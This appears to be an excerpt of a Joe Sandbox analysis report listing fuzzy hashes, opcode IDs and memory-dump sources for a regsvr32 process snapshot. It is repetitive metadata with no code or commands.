                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b873431347e6d5613282c6f44382fd33ee06557e4386b0379dd6a47cdbc2cfe6
                                                                              • Instruction ID: 70f09f9fb3e40204f7acb3d5c6bd2fcbd4ad98d62abbdc6fafaf18b2b28d081a
                                                                              • Opcode Fuzzy Hash: b873431347e6d5613282c6f44382fd33ee06557e4386b0379dd6a47cdbc2cfe6
                                                                              • Instruction Fuzzy Hash: F6613C61A1CA6A4BF748BF2894F61F9BBC2EF55325B04017AD44DF71C7DC08A84287A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4d84273c6bf4ee85f8d7984e8e9be43c28dd297e3c18903b45936976f4d7ba5
                                                                              • Instruction ID: 0fc29e6d4052a436802a858eeb2ef70d62c48f9c5e7c1e29fba5fabdfb626017
                                                                              • Opcode Fuzzy Hash: b4d84273c6bf4ee85f8d7984e8e9be43c28dd297e3c18903b45936976f4d7ba5
                                                                              • Instruction Fuzzy Hash: A4718461F18A1F8FEB98EF2884E56B9FBE1EF58214B040179D00DF31D6DE18E84587A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bb3c91628c0f878b35a692e3aab14937cd4f1a4ea5132914a70db18707e397ed
                                                                              • Instruction ID: 46624ccf70e9a0ea8f35074bc28f46959ec5769d308dd66435d1c7874282ddc4
                                                                              • Opcode Fuzzy Hash: bb3c91628c0f878b35a692e3aab14937cd4f1a4ea5132914a70db18707e397ed
                                                                              • Instruction Fuzzy Hash: 8681E461A1C95A4AEB9CEF28C4B66B4BBD2EF94304F480479D05DF71CBCD28E841C671
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0bf507ebb0111d8074aff13c02b303faebe9906eb9699c8cccdad0b654dc2ded
                                                                              • Instruction ID: fe885ebd7973a2aaf675f538eb11b6e3ef5286a3e5863767fcb40aa5eb0e466c
                                                                              • Opcode Fuzzy Hash: 0bf507ebb0111d8074aff13c02b303faebe9906eb9699c8cccdad0b654dc2ded
                                                                              • Instruction Fuzzy Hash: 87716E30A1891A9FEB84EB18C495B68B7E2FF98314F144179D01ED36DADE29FC42CB54
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 518ffeced1f7d6471f17a222c7b2e2f4482783a88d62499e7cfdba3763bd781f
                                                                              • Instruction ID: 90feddc798d271a6b7fd9e0fb03ebd60a1293e53fae337118a172189daa6b86b
                                                                              • Opcode Fuzzy Hash: 518ffeced1f7d6471f17a222c7b2e2f4482783a88d62499e7cfdba3763bd781f
                                                                              • Instruction Fuzzy Hash: DB515431618E1E4BE768DA18D895570B7E0EFA4314B14027DC45ED32E6EE29F883C7A4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bbfd25ed8231ee0af5dd246b842023d78c89b72a3dfc3e55a80d6c187ad8b943
                                                                              • Instruction ID: fbddb0ad421e5f4099a4a512cdecf65ae76d0268ff3fa79b2d7ba35f2e86b23e
                                                                              • Opcode Fuzzy Hash: bbfd25ed8231ee0af5dd246b842023d78c89b72a3dfc3e55a80d6c187ad8b943
                                                                              • Instruction Fuzzy Hash: 07715071E1891E8FEB98EF18C8A56B9B7E1EF58304F0001B9C05DF3295DE34A981CB65
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2bbb038b445c55598433ef8a750eb6393f8f5aa7a91ec12323a4003afb677419
                                                                              • Instruction ID: 2010e63af6defdfc18c00f27ebd7d379a9df4a413bd7a19a38733adea788ae73
                                                                              • Opcode Fuzzy Hash: 2bbb038b445c55598433ef8a750eb6393f8f5aa7a91ec12323a4003afb677419
                                                                              • Instruction Fuzzy Hash: C8519871A1CA5E8FDB88EE28C8A16B577D1FF95714F0401B9D05EE72C6CE28E811C7A1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ebbc4a7b5a7b88026dd3fb85651e3e98bbda467cb79aa3e638e80150e97687f1
                                                                              • Instruction ID: ba2b5282322821d7881e093e947576adb60a4de7edc5f595f1b9ccf632742f13
                                                                              • Opcode Fuzzy Hash: ebbc4a7b5a7b88026dd3fb85651e3e98bbda467cb79aa3e638e80150e97687f1
                                                                              • Instruction Fuzzy Hash: 0A513B77A0866A5BFB01FF2CF4E24F57FD1EF513397180076D0889A0A7DD182096CAA9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dc944549a3263495cb58872e4e16486da50aa54bc4eb44478d48f350fd29a01d
                                                                              • Instruction ID: 2b131f1e21a3500e4e0db44e52c959777c828bf776e95f6e1ca95d2a812da5e8
                                                                              • Opcode Fuzzy Hash: dc944549a3263495cb58872e4e16486da50aa54bc4eb44478d48f350fd29a01d
                                                                              • Instruction Fuzzy Hash: 6D51E6A1E1895E4FFB84EB5CD8A57E9BBE2FF44300F44027AD009E32D6DE686841C714
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 679728fc03aaa049c8fee3b9e20831e0c317f325c810a060043b3d696af7b7ff
                                                                              • Instruction ID: 29f983522a1afa4d3fb6863d292ef0445671a329dbcda567b2da1f451f64804c
                                                                              • Opcode Fuzzy Hash: 679728fc03aaa049c8fee3b9e20831e0c317f325c810a060043b3d696af7b7ff
                                                                              • Instruction Fuzzy Hash: 42511F21B2CE2A4BDB58B61C94A6675F7D2FF94704F040179E44DE32C6DD18FC0186E6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d6c28a87c7a22b8cc6519234a818df2fde10e5e38cec52656d808a450398f336
                                                                              • Instruction ID: 2fc328811b6ac4c7a7319da8520983f754d86d632b795dd413d45b3307611bb9
                                                                              • Opcode Fuzzy Hash: d6c28a87c7a22b8cc6519234a818df2fde10e5e38cec52656d808a450398f336
                                                                              • Instruction Fuzzy Hash: 2251FE71A1895D8FFB94EB1CC4A4BA8BBE2EF98310F1501B5E01DD72A5DE34AC81DB14
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9146dddf7fed6814d9f7d76854385de3de4c2efacf76c1d71452df433653954
                                                                              • Instruction ID: 62b496f2240d8e3699b92e3bd327abf029f3f933b06335165cdba0cdbcd2c77a
                                                                              • Opcode Fuzzy Hash: d9146dddf7fed6814d9f7d76854385de3de4c2efacf76c1d71452df433653954
                                                                              • Instruction Fuzzy Hash: F951F62194D6DA0FF796877884603A5BFE2AF86220F0945FBC089DB1CBCD6D5846D371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 120a1b09414cc6f2ac69589d20b095cd93b17bf3a47612a3ed12823af5fdd877
                                                                              • Instruction ID: 123e408c10e9805297217582a85d680078c40dcb9fde849b785715985f58b9c8
                                                                              • Opcode Fuzzy Hash: 120a1b09414cc6f2ac69589d20b095cd93b17bf3a47612a3ed12823af5fdd877
                                                                              • Instruction Fuzzy Hash: CA41E811B1C95E8BE788FA2898F46B9FAC1FF54614F48017AD00DF32DACD18E841C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3605fcf634e884a98b25f47af3ba334009ed8c6a78781c633d4ea17380a2c37
                                                                              • Instruction ID: bb2c4841366aaf6b6919c1f22ffe450e9fbc3ca89f223199a35abea4819124eb
                                                                              • Opcode Fuzzy Hash: d3605fcf634e884a98b25f47af3ba334009ed8c6a78781c633d4ea17380a2c37
                                                                              • Instruction Fuzzy Hash: EB411E72F1CE294BE744A72C98656B5BBC1FF85324F04027AE04DD32C6ED14EC0196EA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bac76c70045225a4f6ba90cdb087cdb36700702fe45850cb3d0930c87a38797d
                                                                              • Instruction ID: a85a4109a0ce2016d211a1f02c1cf8be2c43e838af3aabbb2d2687519f2b867e
                                                                              • Opcode Fuzzy Hash: bac76c70045225a4f6ba90cdb087cdb36700702fe45850cb3d0930c87a38797d
                                                                              • Instruction Fuzzy Hash: 6B414E22A1CA598FE744E62C98651B5BBD1EF85324F04017EE04DE31C7ED14EC0187AA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e900208695963e1562eb7b82c38d8b5613d9bbcb8929c4524932613c1c330997
                                                                              • Instruction ID: 3ff0906a923c86803c98b2e711e2964b00b77eda40b257c5a049bf98bcc3836c
                                                                              • Opcode Fuzzy Hash: e900208695963e1562eb7b82c38d8b5613d9bbcb8929c4524932613c1c330997
                                                                              • Instruction Fuzzy Hash: 4841A561A289AE8FEB54F728C4F56B5FBE1FF44304B4402B6D00AD75C7CD18A841DBA6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5c46ff2699c7b01e52c0d1812fafbc5a90ace38da1f31c3957bd703bce74584d
                                                                              • Instruction ID: 11f5e79c24c8176f3d1fd30f15a0e0f70c78b807bb13a9f2981d3b3ccb464c51
                                                                              • Opcode Fuzzy Hash: 5c46ff2699c7b01e52c0d1812fafbc5a90ace38da1f31c3957bd703bce74584d
                                                                              • Instruction Fuzzy Hash: BF41B721E1896E8BEB98EF68C8A56B9F6E1FF48304F050575D41DF31D6CE28A841C7B1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 772d31ce83fd5dd587c7cfd28e5311a401d8afbc4a1b89006fcc77c8a1b4482b
                                                                              • Instruction ID: d04dfdd0d4edde420168bef04f3f0d83a3810507635013eb407e9c8f1577d9da
                                                                              • Opcode Fuzzy Hash: 772d31ce83fd5dd587c7cfd28e5311a401d8afbc4a1b89006fcc77c8a1b4482b
                                                                              • Instruction Fuzzy Hash: E441D332A1896D8FEB94E71CD4A66ADBBE1FF98310B05017AD01DF31DACE24684187B5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 190aad7630fbe95d0116db15518581351b93d332a06bde1379acd4de693d9497
                                                                              • Instruction ID: c14dca9c3bcbe82d72b96fbe729a7bb4af9cb8b13f4979287405af6e56aa3c11
                                                                              • Opcode Fuzzy Hash: 190aad7630fbe95d0116db15518581351b93d332a06bde1379acd4de693d9497
                                                                              • Instruction Fuzzy Hash: 0E411452F1EA9A5FE786E73884B9678AEC1EF55200B4800F9D00DE72D7CD1C9C41D36A
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13faf4e465b9a4dd913597c5741a6f330cb44aeec04d0ae8f4267bb6187b9aaf
                                                                              • Instruction ID: b077666b0157a5f2a1e0058b39b48680d89540cd845d490ecee07ad4ac947dbf
                                                                              • Opcode Fuzzy Hash: 13faf4e465b9a4dd913597c5741a6f330cb44aeec04d0ae8f4267bb6187b9aaf
                                                                              • Instruction Fuzzy Hash: B541D631A1CB599FEF54EB1888A55E9BBD1FF59314F04027EE04DE31C2DE28A440C796
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe15c93ccc12d6ac0deba3648fa2e79f74330171c465c34f352b88f6f3410f7a
                                                                              • Instruction ID: e226acfaac942a84fb65a77c710626f632f22527e69c45ab3e122396622f46bc
                                                                              • Opcode Fuzzy Hash: fe15c93ccc12d6ac0deba3648fa2e79f74330171c465c34f352b88f6f3410f7a
                                                                              • Instruction Fuzzy Hash: 90311811A1C9DE9FEB94E72888B52B4BFD1FF59210F0400BAD05DD71CBDD18A805D769
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7a23d529eae7682b5e4970ef9f5821a97a66be823e595737ea5f9f2ab1558d0a
                                                                              • Instruction ID: 333585a35adcd4633e9d8b969ddfc0a130c69d60a3c28d3eb9bf2adce6e9db3e
                                                                              • Opcode Fuzzy Hash: 7a23d529eae7682b5e4970ef9f5821a97a66be823e595737ea5f9f2ab1558d0a
                                                                              • Instruction Fuzzy Hash: 3741D711A1CD5E8BE789FB2884B46B4FAD1FF54610B4801BAD05DF32DBCE18E845C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 394b6e250fc6ed1bee05808c9ad5ca6d5f4b8707cb42c81ce5aaa042ab1cb4e9
                                                                              • Instruction ID: 4449685d8faa78639296575b1b1e0632f6e7993e76820a09235fa61ebff19eb1
                                                                              • Opcode Fuzzy Hash: 394b6e250fc6ed1bee05808c9ad5ca6d5f4b8707cb42c81ce5aaa042ab1cb4e9
                                                                              • Instruction Fuzzy Hash: 5031D962E1CA5E8BDB58EF1898A51B9BBD1FF59714F040179E01DF31C6CE24AC01CBA5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b044ccb2863dae19804785a4e36828732cdd8f8bfeac9670c54faaa0b833eb5
                                                                              • Instruction ID: 63ed244cf982bf49261f3107bcf33c19a2ad4a8b7ec4dfbea8ec1b7cc1681939
                                                                              • Opcode Fuzzy Hash: 3b044ccb2863dae19804785a4e36828732cdd8f8bfeac9670c54faaa0b833eb5
                                                                              • Instruction Fuzzy Hash: 2841A631A0C91D4FDB68DA08C4E55B8BBD1EF99311F000179D05EE36DADF29AC46D7A8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 412223bc8e06374eba17855fbb3e6798220017b9116c3042c9651ff4120e2ff3
                                                                              • Instruction ID: 460056c2d0d7722ed0629dcd090c988928f8ee4525f4c4b447e92ae6959e99ab
                                                                              • Opcode Fuzzy Hash: 412223bc8e06374eba17855fbb3e6798220017b9116c3042c9651ff4120e2ff3
                                                                              • Instruction Fuzzy Hash: E6319262E189AD4FEB94E65898662ADBBE1FF48310F45017AD01DF32CACD286C0197B5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 677b55df27e2b9c2101a80728c8802aaf65394391d419a2b96a2a64c6af940e3
                                                                              • Instruction ID: 0908a74c4883012f6fe231ac9e4a8009a4c1bacc77fc7ebcdc62498c1978f72a
                                                                              • Opcode Fuzzy Hash: 677b55df27e2b9c2101a80728c8802aaf65394391d419a2b96a2a64c6af940e3
                                                                              • Instruction Fuzzy Hash: DD319262B1DE9A0FE394961CE8647B5FBC0EF95321F4405BBF848D31D6E90AD481C3A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70e75a76598ed1fdbebcf3d43323c1ce52490f1e9fb272c1e2b6f1185a91d7f8
                                                                              • Instruction ID: 700c15f0cdfd1b9a2a4cf852b0b7d3e6338a0bf65168abbf80581e57815e50db
                                                                              • Opcode Fuzzy Hash: 70e75a76598ed1fdbebcf3d43323c1ce52490f1e9fb272c1e2b6f1185a91d7f8
                                                                              • Instruction Fuzzy Hash: C2314C62B2CB994FE754E728D8A16B5BBE1EF95304F0801BAD04DD31D7CE18A844C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 264f141270260664cc5a64a8a1970354f53059fed78da2f3cf73ee496d5a66d8
                                                                              • Instruction ID: d91d7d5d8ca2aff6e3d513966da301ccbe182b25300fb0625e77ebd0273148c1
                                                                              • Opcode Fuzzy Hash: 264f141270260664cc5a64a8a1970354f53059fed78da2f3cf73ee496d5a66d8
                                                                              • Instruction Fuzzy Hash: 8531D8A3A5DADE4AD705EB2DE8F20E47B91FF5113874C01BAC058DB693DC085856C379
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 06cd54f622fd43795b0747b7a96f5d5c8d8aaadf297f817b4c322d95efb87cd6
                                                                              • Instruction ID: e3b9a67801f78030178902abafad84b49027656fdd136f15c57fe064c0f92626
                                                                              • Opcode Fuzzy Hash: 06cd54f622fd43795b0747b7a96f5d5c8d8aaadf297f817b4c322d95efb87cd6
                                                                              • Instruction Fuzzy Hash: 93213956B1DD6E0BE36CE66C98E15B5BBC2EF44250B180279D01DE32CBDD18BC42C6A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dc6e389714bb1a58b8777a0c35c4f83f7fdc4a95b25ec2013a2a7435e5aa4c66
                                                                              • Instruction ID: b42304c0b7208e0a202ce3f17643345d5bb1284b9d5b52a095205df7590389de
                                                                              • Opcode Fuzzy Hash: dc6e389714bb1a58b8777a0c35c4f83f7fdc4a95b25ec2013a2a7435e5aa4c66
                                                                              • Instruction Fuzzy Hash: BA210E61B1DE694BE398A65CA869174FFD0FB99625B0403BFE04CE32D7CD185C4182EA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe17db16fa4cf3450da0be56cf627431ff4f7965c98f548b1c323a974f13108b
                                                                              • Instruction ID: f96989e5cc994d6790d5e434a0f7c68bc18c52e30c4fd7b810550f176b5f91da
                                                                              • Opcode Fuzzy Hash: fe17db16fa4cf3450da0be56cf627431ff4f7965c98f548b1c323a974f13108b
                                                                              • Instruction Fuzzy Hash: B2311070A18A5E8FDB88EF18C4A56A9F7A1FF54304F4015B9E41DE36C6CA74E841C791
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b496efa37383d875f4f9166ed231275be655238068433ccb98f1ee5e31026b18
                                                                              • Instruction ID: 22f14ad6a0177dcec774f203e80e66746fbdd480dad66dd1276b3f7b2ea017aa
                                                                              • Opcode Fuzzy Hash: b496efa37383d875f4f9166ed231275be655238068433ccb98f1ee5e31026b18
                                                                              • Instruction Fuzzy Hash: 8E214B56B2CD2E0BE36CE66C98E15B5B7C2EF84250B580179E05DF31CBDD14BC42CAA0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d14b6a0f94892e80148c4d8b2675f2a8822e236edbbd3e4103f063665b90e7fd
                                                                              • Instruction ID: 0d83ace3e9562160906ed172ad51debcf8265354d5e15c22d6ee226e80326b9a
                                                                              • Opcode Fuzzy Hash: d14b6a0f94892e80148c4d8b2675f2a8822e236edbbd3e4103f063665b90e7fd
                                                                              • Instruction Fuzzy Hash: 8631B631A1CA594FDB88EF1CC4512B9BBE1FF94310F40027AE449E3295CE24F8428791
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f2a8cae975ee2677e2189f3865b5dcf7b73b68b5310a9f8f835f3ee05fdb913c
                                                                              • Instruction ID: 68f75a395cd46f9259c494c4c654a600b59f9226c4f0915a01c0c2d4a88892c7
